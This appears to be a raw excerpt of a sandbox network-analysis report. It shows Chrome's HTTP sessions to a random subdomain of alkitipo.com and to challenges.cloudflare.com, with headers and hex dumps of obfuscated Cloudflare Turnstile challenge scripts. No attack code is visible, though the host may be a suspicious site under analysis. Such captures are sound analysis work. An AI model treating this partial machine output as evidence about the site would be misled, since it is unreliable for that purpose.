                                                                      Data Ascii: ray$/.test(a))return ot(e,t)}}function Ie(e,t){return zt(e)||Bt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Pe(e,t){var a={label:0,sent:function(){if(l[0
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                      Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var We=300030;var Ue=300031;var q;(fu
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 65 76 65 72 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 6c 77 61 79 73 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 78 65 63 75 74 65 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 6e 74 65 72 61 63 74 69 6f 6e 4f 6e 6c 79 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 6e 64 65 72
                                                                      Data Ascii: manual",e.Auto="auto"})(ee||(ee={}));var ce;(function(e){e.Never="never",e.Manual="manual",e.Auto="auto"})(ce||(ce={}));var Q;(function(e){e.Always="always",e.Execute="execute",e.InteractionOnly="interaction-only"})(Q||(Q={}));var me;(function(e){e.Render
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 4d 2e 4e 6f 72 6d 61 6c 2c 4d 2e 43 6f 6d 70 61 63 74 2c 4d 2e 49 6e 76 69 73 69 62 6c 65 2c 4d 2e 46 6c 65 78 69 62 6c 65 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 4e 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74
                                                                      Data Ascii: unction pt(e){return L([M.Normal,M.Compact,M.Invisible,M.Flexible],e)}function vt(e){return L(["auto","manual","never"],e)}function mt(e){return L(["auto","manual","never"],e)}var Nr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){return e==="auto"||Nr.test
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 72 22 2c 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 41 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22
                                                                      Data Ascii: r","ro-ro"];function Tt(e,t){var a="https://challenges.cloudflare.com";if(t){var o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,v,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",A=a["feedback-enabled"]===!1?"
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77
                                                                      Data Ascii: ect.setPrototypeOf||function(o,c){return o.__proto__=c,o},te(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,w
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 7a 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 42 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73
                                                                      Data Ascii: ,configurable:!0}}),te(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"||typeof t=="function")?t:ze(e)}function dr(e){var t=Be();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 67 22 2c 22 2f 22 29 2c 6c 2c 76 2c 68 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 76 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 76 21 3d 3d 76 6f 69 64 20 30 3f 76 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28
                                                                      Data Ascii: unction(e,t,a){var o=Tt(t.params,!1),c="h/".concat("g","/"),l,v,h="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((v=t.params.theme)!==null&&v!==void 0?v:t.theme,"/").concat(


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.649712104.21.5.1304431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:54 UTC574OUTGET /cdn-cgi/challenge-platform/h/g/scripts/jsd/f3b948d8acb8/main.js? HTTP/1.1
                                                                      Host: a6b7c1be5ea686d6c0c05e957.alkitipo.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: same-origin
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:54 UTC959INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:54 GMT
                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                      Content-Length: 8458
                                                                      Connection: close
                                                                      cache-control: max-age=14400, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                      x-content-type-options: nosniff
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xchY4VRZmGzaqN8uZ2mG0ZS0p7sNYi3Z1nOuUFK6RxRsveQtvxEvrfuOdSeuloAZTVxT3oBvSartpV5qU38Eay7ayy845eUCUDyq0%2Fm36BgKUCrGx2audIX%2FgmVo3BwPkjC24y4GzCIDA3uHnDEKJ8xdEBlRgcZ5Kg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Strict-Transport-Security: max-age=0
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4a991859f1ba-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=629&min_rtt=534&rtt_var=268&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=1146&delivery_rate=5423220&cwnd=236&unsent_bytes=0&cid=e77cb54b23f6a0fb&ts=87&x=0"
                                                                      2025-03-19 10:29:54 UTC410INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 46 50 57 76 3a 27 67 27 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 57 2c 68 2c 69 2c 6e 2c 6f 2c 73 2c 7a 2c 41 29 7b 57 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 56 2c 65 2c 66 29 7b 66 6f 72 28 56 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 56 28 33 32 32 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 56 28 33 34 31 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 56 28 32 36 34 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 56 28 32 37 35 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 56 28 32 37 31 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 56 28 32 36 35 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 56 28 32 33 38 29 29 2f 37 29 2b 70 61 72
                                                                      Data Ascii: window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,n,o,s,z,A){W=b,function(c,d,V,e,f){for(V=b,e=c();!![];)try{if(f=-parseInt(V(322))/1*(parseInt(V(341))/2)+parseInt(V(264))/3*(parseInt(V(275))/4)+-parseInt(V(271))/5+parseInt(V(265))/6*(parseInt(V(238))/7)+par
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 68 69 73 7c 7c 73 65 6c 66 2c 69 3d 68 5b 57 28 32 38 32 29 5d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 61 34 2c 64 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 61 34 3d 57 2c 64 3d 53 74 72 69 6e 67 5b 61 34 28 33 31 39 29 5d 2c 65 3d 7b 27 68 27 3a 66 75 6e 63 74 69 6f 6e 28 45 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 45 3f 27 27 3a 65 2e 67 28 45 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 46 2c 61 35 29 7b 72 65 74 75 72 6e 20 61 35 3d 62 2c 61 35 28 33 31 33 29 5b 61 35 28 33 30 32 29 5d 28 46 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 2c 61 36 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 2c 4f 2c 50 2c 51 2c 52 2c 53 2c 54 2c 55 29 7b 69 66 28 61 36 3d 61 34 2c 45 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 49 3d 7b 7d 2c 4a
                                                                      Data Ascii: his||self,i=h[W(282)],n=function(a4,d,e,f){return a4=W,d=String[a4(319)],e={'h':function(E){return null==E?'':e.g(E,6,function(F,a5){return a5=b,a5(313)[a5(302)](F)})},'g':function(E,F,G,a6,H,I,J,K,L,M,N,O,P,Q,R,S,T,U){if(a6=a4,E==null)return'';for(I={},J
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 31 26 55 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 61 36 28 32 32 39 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 7d 4c 2d 2d 2c 30 3d 3d 4c 26 26 28 4c 3d 4d 61 74 68 5b 61 36 28 32 36 32 29 5d 28 32 2c 4e 29 2c 4e 2b 2b 29 2c 64 65 6c 65 74 65 20 4a 5b 4b 5d 7d 65 6c 73 65 20 66 6f 72 28 55 3d 49 5b 4b 5d 2c 48 3d 30 3b 48 3c 4e 3b 50 3d 50 3c 3c 31 2e 30 38 7c 31 26 55 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 61 36 28 32 32 39 29 5d 28 47 28 50 29 29 2c 50 3d 30 29 3a 51 2b 2b 2c 55 3e 3e 3d 31 2c 48 2b 2b 29 3b 4c 2d 2d 2c 30 3d 3d 4c 26 26 4e 2b 2b 7d 66 6f 72 28 55 3d 32 2c 48 3d 30 3b 48 3c 4e 3b 50 3d 31 2e 37 37 26 55 7c 50 3c 3c 31 2c 46 2d 31 3d 3d 51 3f 28 51 3d 30 2c 4f 5b 61 36 28 32 32 39 29
                                                                      Data Ascii: 1&U,F-1==Q?(Q=0,O[a6(229)](G(P)),P=0):Q++,U>>=1,H++);}L--,0==L&&(L=Math[a6(262)](2,N),N++),delete J[K]}else for(U=I[K],H=0;H<N;P=P<<1.08|1&U,F-1==Q?(Q=0,O[a6(229)](G(P)),P=0):Q++,U>>=1,H++);L--,0==L&&N++}for(U=2,H=0;H<N;P=1.77&U|P<<1,F-1==Q?(Q=0,O[a6(229)
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 4c 5b 61 39 28 32 39 34 29 5d 28 27 27 29 7d 69 66 28 30 3d 3d 49 26 26 28 49 3d 4d 61 74 68 5b 61 39 28 32 36 32 29 5d 28 32 2c 4b 29 2c 4b 2b 2b 29 2c 48 5b 55 5d 29 55 3d 48 5b 55 5d 3b 65 6c 73 65 20 69 66 28 4a 3d 3d 3d 55 29 55 3d 4d 2b 4d 5b 61 39 28 33 30 32 29 5d 28 30 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 4c 5b 61 39 28 32 32 39 29 5d 28 55 29 2c 48 5b 4a 2b 2b 5d 3d 4d 2b 55 5b 61 39 28 33 30 32 29 5d 28 30 29 2c 49 2d 2d 2c 4d 3d 55 2c 30 3d 3d 49 26 26 28 49 3d 4d 61 74 68 5b 61 39 28 32 36 32 29 5d 28 32 2c 4b 29 2c 4b 2b 2b 29 7d 7d 7d 2c 66 3d 7b 7d 2c 66 5b 61 34 28 32 33 34 29 5d 3d 65 2e 68 2c 66 7d 28 29 2c 6f 3d 7b 7d 2c 6f 5b 57 28 32 33 37 29 5d 3d 27 6f 27 2c 6f 5b 57 28 32 39 37 29 5d 3d 27 73 27 2c 6f 5b 57 28
                                                                      Data Ascii: L[a9(294)]('')}if(0==I&&(I=Math[a9(262)](2,K),K++),H[U])U=H[U];else if(J===U)U=M+M[a9(302)](0);else return null;L[a9(229)](U),H[J++]=M+U[a9(302)](0),I--,M=U,0==I&&(I=Math[a9(262)](2,K),K++)}}},f={},f[a4(234)]=e.h,f}(),o={},o[W(237)]='o',o[W(297)]='s',o[W(
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 77 30 3b 61 6e 79 6a 37 3b 73 54 55 4c 35 3b 53 4c 65 6f 32 3b 45 46 70 47 49 30 3b 48 61 50 72 34 3b 57 6c 67 56 44 31 3b 4d 6a 76 79 31 3b 6c 43 4e 72 50 34 3b 6f 70 6d 65 47 34 3b 51 4d 66 75 76 34 3b 44 69 53 44 34 3b 4e 4c 64 43 32 2c 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 2c 64 65 74 61 69 6c 2c 63 68 63 74 78 2c 73 74 79 6c 65 2c 69 6e 64 65 78 4f 66 2c 31 38 38 32 6d 58 77 51 52 46 2c 70 72 6f 74 6f 74 79 70 65 2c 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 2c 73 70 6c 69 74 2c 70 75 73 68 2c 6a 73 64 2c 65 72 72 6f 72 20 6f 6e 20 63 66 5f 63 68 6c 5f 70 72 6f 70 73 2c 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 2c 73 79 6d 62 6f 6c 2c 74 4a 64 42 74 76 2c 41 72 72 61 79 2c 63 68 6c 41 70 69 55 72 6c 2c 6f 62 6a 65
                                                                      Data Ascii: w0;anyj7;sTUL5;SLeo2;EFpGI0;HaPr4;WlgVD1;Mjvy1;lCNrP4;opmeG4;QMfuv4;DiSD4;NLdC2,onreadystatechange,detail,chctx,style,indexOf,1882mXwQRF,prototype,getOwnPropertyNames,split,push,jsd,error on cf_chl_props,addEventListener,symbol,tJdBtv,Array,chlApiUrl,obje
                                                                      2025-03-19 10:29:54 UTC1369INData Raw: 73 70 6c 69 74 28 27 2c 27 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 6d 7d 2c 61 28 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 59 2c 63 2c 64 2c 65 2c 66 29 7b 72 65 74 75 72 6e 20 59 3d 57 2c 63 3d 68 5b 59 28 33 32 36 29 5d 2c 64 3d 33 36 30 30 2c 65 3d 4d 61 74 68 5b 59 28 32 38 30 29 5d 28 2b 61 74 6f 62 28 63 2e 74 29 29 2c 66 3d 4d 61 74 68 5b 59 28 32 38 30 29 5d 28 44 61 74 65 5b 59 28 32 35 31 29 5d 28 29 2f 31 65 33 29 2c 66 2d 65 3e 64 3f 21 5b 5d 3a 21 21 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 2c 45 2c 46 2c 61 62 2c 47 29 7b 61 62 3d 57 3b 74 72 79 7b 72 65 74 75 72 6e 20 45 5b 46 5d 5b 61 62 28 32 35 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 27 70 27 7d 63 61 74 63 68 28 48 29 7b 7d 74 72 79 7b 69 66
                                                                      Data Ascii: split(','),a=function(){return am},a()}function k(Y,c,d,e,f){return Y=W,c=h[Y(326)],d=3600,e=Math[Y(280)](+atob(c.t)),f=Math[Y(280)](Date[Y(251)]()/1e3),f-e>d?![]:!![]}function x(e,E,F,ab,G){ab=W;try{return E[F][ab(257)](function(){}),'p'}catch(H){}try{if
                                                                      2025-03-19 10:29:54 UTC1203INData Raw: 63 74 69 6f 6e 20 79 28 63 2c 61 63 2c 64 29 7b 66 6f 72 28 61 63 3d 57 2c 64 3d 5b 5d 3b 6e 75 6c 6c 21 3d 3d 63 3b 64 3d 64 5b 61 63 28 33 31 37 29 5d 28 4f 62 6a 65 63 74 5b 61 63 28 33 32 39 29 5d 28 63 29 29 2c 63 3d 4f 62 6a 65 63 74 5b 61 63 28 32 35 33 29 5d 28 63 29 29 3b 72 65 74 75 72 6e 20 64 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 45 2c 46 2c 61 33 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 2c 4e 29 7b 69 66 28 61 33 3d 57 2c 21 6a 28 2e 30 31 29 29 72 65 74 75 72 6e 21 5b 5d 3b 48 3d 28 47 3d 7b 7d 2c 47 5b 61 33 28 33 31 34 29 5d 3d 45 2c 47 5b 61 33 28 33 30 37 29 5d 3d 46 2c 47 29 3b 74 72 79 7b 49 3d 68 5b 61 33 28 33 32 36 29 5d 2c 4a 3d 61 33 28 32 36 37 29 2b 68 5b 61 33 28 32 37 37 29 5d 5b 61 33 28 33 30 36 29 5d 2b 61 33 28 32 38 35 29
                                                                      Data Ascii: ction y(c,ac,d){for(ac=W,d=[];null!==c;d=d[ac(317)](Object[ac(329)](c)),c=Object[ac(253)](c));return d}function m(E,F,a3,G,H,I,J,K,L,M,N){if(a3=W,!j(.01))return![];H=(G={},G[a3(314)]=E,G[a3(307)]=F,G);try{I=h[a3(326)],J=a3(267)+h[a3(277)][a3(306)]+a3(285)


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.649713104.18.95.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:29:54 UTC863OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/k0ed6/0x4AAAAAABBagSav2GMcq5ob/auto/fbE/new/normal/auto/ HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-Dest: iframe
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://a6b7c1be5ea686d6c0c05e957.alkitipo.com/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:29:54 UTC1297INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:29:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Content-Length: 28104
                                                                      Connection: close
                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                      content-security-policy: default-src 'none'; script-src 'nonce-K0jqkdbCd8U4XVdG' 'unsafe-eval'; script-src-attr 'none'; worker-src blob:; style-src 'unsafe-inline'; img-src 'self'; connect-src 'self'; frame-src 'self' blob:; child-src 'self' blob:; form-action 'none'; base-uri 'self'; sandbox allow-same-origin allow-scripts allow-popups allow-forms
                                                                      cross-origin-embedder-policy: require-corp
                                                                      cross-origin-opener-policy: same-origin
                                                                      cross-origin-resource-policy: cross-origin
                                                                      origin-agent-cluster: ?1
                                                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                      2025-03-19 10:29:54 UTC411INData Raw: 63 72 69 74 69 63 61 6c 2d 63 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 62 69 6c 65 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2c 20 55 41 2d 42 69 74 6e 65 73 73 2c 20 55 41 2d 41 72 63 68 2c 20 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 55 41 2d 4d 6f 62 69 6c 65 2c 20 55 41 2d 4d 6f 64 65 6c 2c 20 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 2c 20 55 41 2d 50
                                                                      Data Ascii: critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-P
